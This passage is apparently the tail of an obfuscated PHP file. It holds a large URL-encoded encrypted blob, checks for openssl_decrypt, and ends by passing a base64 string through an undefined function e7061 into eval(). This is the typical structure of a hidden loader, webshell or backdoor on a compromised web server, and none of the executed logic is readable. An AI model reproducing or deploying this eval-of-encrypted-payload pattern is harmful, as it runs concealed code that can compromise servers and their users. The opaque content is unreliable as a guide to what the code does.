2dSILs9wXPTjowwmjY5%2Bon4JxDgl9o8hNzXfl0b1wPMw0ilTf3rujwd%2BuhCeaDqS6cmmnvSD11zmOy7k%2F73bxfS4N1Gb99DfRtqijHo7o09GF%2FpMSpL7d6LiDyIiwxV9lSSp5pD4O2QOJn9uPPZJDhIhTj%2FAh4VAXgqdD3N54HtTpJatLEyqLmwi3D9oQi2L%2BD5RKPSwTOdL%2BagPjyeV9fL4NqpHxz2Pq2JNqW7Y4pK4QqyaBP85HZHamOptP81pMcxRIJ%2Bhz7rHbOZA1qxkNfRNjaBXxbcIZio7NXN0mN0Zz50Yfae1J%2FB7WZdYb41s79rgVWwg1%2BQB7MfHbWnYX9m6w%2Fx1hrwEtYFh5YlAq2xr0%2B%2FqYdm9%2FBjsUv62%2FXGyMMBuLqy1SbHOZxFmf%2Bu37b%2B2hcU3ixD%2BfByro7wmY61I33kN%2Fu9zyZ9htgTfxppFqIFVo5NNYHnZc8SaNHL9rs7EIqJqi5RwfGvjD3xUh4kN6KbYglnQxhBHnCbUq8ghr2aQDPwVckzR5gQ68x1jQn%2Bik7uEmhp9wMze6HFsc9ARgb%2FP0zCJiU3KNpeF7H17RoC0tkeQ2xmh3ltDPkOa1%2FWQs0fdh5o8qQFC6wtNryI1tY3x5D1La5939v6o9H3Mk49L6AJ1MJ3Y5gEjxHTp8Gr2ljCnX6PVpdGxeycg2xR1nahmTkSWf5Gy32AhZD1c15efIjmq5hWyw6sPtfTbic%2Bl2rujfvGk9Au7Z9dv2blu6gQ7w9E1IiDLokvSPOvyOVp7QAPqVtV9y%2Ba2wCoKn52N8H6b6a2btohIW38m%2B8OmttSmjErPmeXQ18z5zNjsywJpLnxz0fk9Y8%2BU3Dguy74Wsn2SfwtOZg69%2BIX3rn1%2FjY5orUD%2BMtoaRcfnR%2FCbxZDP6TOZIKfcAkeMg8zMsRuDbXDKZzOWC09ctnbu4vvKl3pQ9Ok790vI8xqrc4jT30lAW1uMe%2Fraq827Abmjw4RqcRyt2LkOySNJBdsWApuTIsAEdCv4GdWqyMJsUfAzomZOauTLOAZtDeY9%2FyHs8JFx%2Br7BMZsHId%2BzetBh1Nbz4gr5I%2B1kCzk%2Bdy4Xl3vTfy%2B8DbhXqJrxWWKv0Qt8c23jivsK%2BMMsgrzkO8q%2FY%2Fb%2F2XAdSGLRnK8hdv70rP9Yd%2Bgvwg0VIPfMw8GnBN%2BNBa6f7MfBhg66y2kNshdNLFLWv8h7h%2FWrRptLujlnmwfQH%2FpW2%2BdlqPDHPsl95msjzxCbZRcje2deRq6ZR5u07GmckOhl4rnx7QL62bvYv0voDPKv4FvP9gJdUq%2F6N96tr8t6MY7paex2eXE6P%2Bwdj52NnEO56UF5HVYXbTzzs4%2BxDOMzkOHMxfFvzP%2Ba3BaDPy4vo7m7YlgHo97ygb488sl%2BVoBcXLMYgHmLx9zL87SM1pFzF8b1hfGEGfYcDHP7aL%2B%2Bnrx7kMOTxGQ6r7yYWVqefGZgM2cKs627vHhOk%2BM9V688N2nrFqsVqI0d3i8z2ms2P6KqwdF8mDt4zj1th%2F4%2BMYY%2B%2F5jkvNZyXNjZL7089wT9DHv3HbGMNp0sGOREYrDh81nZ48xoMXkOLKepaeAuhfceu57HtMZN5shxrdL5ubClLABRVpPYM3YmNsaNrqAXBT%2BatTHfx%2FP0zBH6AIijJg%2BmeIst9n8BXe%2Bg%2FyAiNf6RvvUf6P%2FqvGx6z76vMVvm33%2F%2FD%2FTvVMI%3D';if(!function_exists('openssl_decrypt')){die('<h2>Function openssl_decrypt() not found 
!</h2>');}if(!defined('_FILE_')){define("_FILE_",getcwd().DIRECTORY_SEPARATOR.basename($_SERVER['PHP_SELF']),false);}
if(!defined('_DIR_')){define("_DIR_",getcwd(),false);}$e7091="WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno=";eval(e7061($e7091));